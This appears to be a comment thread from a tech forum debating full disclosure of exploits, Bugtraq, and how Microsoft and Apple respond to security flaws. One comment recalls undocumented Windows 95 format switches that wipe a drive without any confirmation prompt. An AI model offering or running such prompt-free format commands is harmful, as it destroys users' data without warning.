Compare and contrast with a closed source product from a good company. As others have noted elsewhere in this thread, Apple has turned out security fixes within nine hours from being notified of a vulnerability in the past. I'm betting you can't make that claim of many Linux patches.
Please don't equate Microsoft with closed source and Linux with open source. If you do, your comparisons will always be fundamentally flawed. I agree that security through obscurity is not the way forward, but just disclosing something (when that something is millions of lines of source code) is not, in itself, enough to provide security either.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
Does anyone have any evidence of virus protection companies directly or indirectly writing viruses? That's a curious question, not an indignant and defensive question.
I don't make the rules. I just make fun of them.
/U /AUTOTEST
or
/U /SELECT?
I remember these worked in Win95 for skipping ALL the notifications, the latter doesn't even format correctly in a sense that it puts a filesystem back there.
I would bet just the opposite. Most "script kiddies" are in fact jr. high or high school age. They have a social "elite" consisting of a few college-age kiddies that haven't let go. These are guys that would write exploits or fix broken ones and pass them out to all of their kiddie friends.
However you look at it, they're all children, regardless of how old they really are. This is why we call them kiddies.
Also, the sky is not blue and there is no porn on the internet.
I don't know about that sky thing, but I've found tons of porn on the internet.
-
- - You can't take something off the Internet! That's like trying to take pee out of a swimming pool.
...today, you cannot format the system drive. Period. NTFS will not release the drive and format requests (and requires) exclusive use before it will format.
The only way to format C: is to never start the Windows (NT) kernel, but boot from, say, an installation CD that doesn't lock parts of the drive.
(Thanks to whoever in this thread pointed this out to me.)
If the exploit is there, it should be public. How else will anyone who is reasonably concerned defend themselves if information about their potential situation is kept a secret?
The fault I find with your analogy is that I don't think it describes the posting of an exploit. How is saying 'people are being shot by a sniper by the name of Joe Smith who lives at 555 Some Street' so different from saying 'people are having X, Y and Z done to their systems by a security hole in IE that resides in the handling of javascript on malicious sites'? In both cases, relevant information, and nothing more, is being offered. Posting an exploit is more like saying 'people are being killed by a sniper. He or she operates something like this... <click> BANG!".
In 99.9% of cases, a working exploit is simply not necessary to defend against a security hole. I mean, what would be the difference between someone explaining in detail what the problem is (and what options lie open to you for fixing it) and someone handing you the source for an exploit? There's only one that I can think of: in the latter case if you are irresponsible you can turn around and use that exploit against others. Exploits do not patch security holes. At best they're a sort of extortion used to get lazy software companies off their a$$es and write patches, but they do nothing constructive in themselves.
As for the exploit already being out in the wild, if the white-hats aren't going to use it and all other relevant info can be disseminated without providing an exploit, then all Bugtraq did was spread the exploit to less clueful black-hats.
Hopefully this has not been posted yet (too lazy to check), this is quite a funny transcript... http://www.cantrip.org/nobugs.html
"Never argue with an idiot, they'll just bring you down to their level and beat you with experience!" --Unknown
Way back when the first Macs were released there were sereous hardware defects Apple denied for a long time then finally had to admit only after they were fixed.
This permitted Apple to continue to sell defective hardware untill Apple could fix it.
Microsoft uses the same tactic but instead of fixing it they just sit.
Take e-mail viruses. Any soft of product review should it be able to reveal the obveous design flaw in the way Outlook express handles file attachents. Be that open source's many eyes or closed sources product review.
In fact the design planning that should be commen for all software would have picked this one up.
But Microsoft's proclamed suppereority to open source design philosophy falls flat on it's face with this one as Microsoft desides to ignore it.
Now let's admit a truth.. This happends in open source as well as closed when ever a programmer fails to consider or disguards possable problems.
It should happen less often in a corprate environment as the programmer has to work with managment and posably a team of programmers who might not approve of the original programmers lazyness.
But once the design phase is done and the code is laied down code review begins in open and closed source. Somebody should have noticed something.
The reason it wasn't picked up by Microsoft is plainly they don't care.
But give them the benifit of the doupt. Maybe somebody dropped LSD in the watercooler during the whole software dev process. Office pranks do happen.
So let's be really nice and say Microsoft just kinda messed up and never noticed this flaw.
When someone did and created the first real e-mail virus (instead of the rumored same), then Microsoft should have sat up and taken notice.
Sometimes it takes a blindingly obvious result before a software team will notice.. that's again a universal truth and not unique to closed source.
But once done it's there for the world to see.
And Microsoft... IGNORED IT...
This is why we have e-mail viruses today.
Microsoft needs more than just a slap in the face.
Someday somebody's going to make a virus OS that installs over Windows, and while users will usually just reinstall Windows, Microsoft will take the threat seriously.
I don't actually exist.
Bruce Schneier's take on this from the ever-excellent cryptogram is here:
Full Disclosure Article
-=DaveHowe=-
$M may be succeeding in getting bugtraq shut down. I haven't received a bugtraq for several days, and this morning, securityfocus.com appears to be down. Maybe it's a routing error, but ...
I take no responsibility for what I say. Even though I'm never wrong
I thought it was an honest question... Ah well!
"They are fools that think that wealth or women or strong drink or even drugs can buy the most in effort out of the soul of a man. These things offer pale pleasures compared to that which is greatest of them all, that task which demands from him more than his utmost strength, that absorbs him, bone and sinew and brain and hope and fear and dreams -- and still calls for more.
They are fools that think otherwise. No great effort was ever bought. No painting, no music, no poem, no cathedral in stone, no church, no state was ever raised into being for payment of any kind. No Parthenon, no Thermopylae was ever built or fought for pay or glory; no Bukhara sacked, or China ground beneath Mongol heel, for loot or power alone. The payment for doing these things was itself the doing of them.
To wield oneself -- to use oneself as a tool in one's own hand -- and so to make or break that which no one else can build or ruin -- THAT is the greatest pleasure known to man! To one who has felt the chisel in his hand and set free the angel prisoned in the marble block, or to one who has felt sword in hand and set homeless the soul that a moment before lived in the body of his mortal enemy -- to those both come alike the taste of that rare food spread only for demons or for gods."
-- Gordon R. Dickson, "Soldier Ask Not"
- this post brought to you by the Automated Last Post Generator...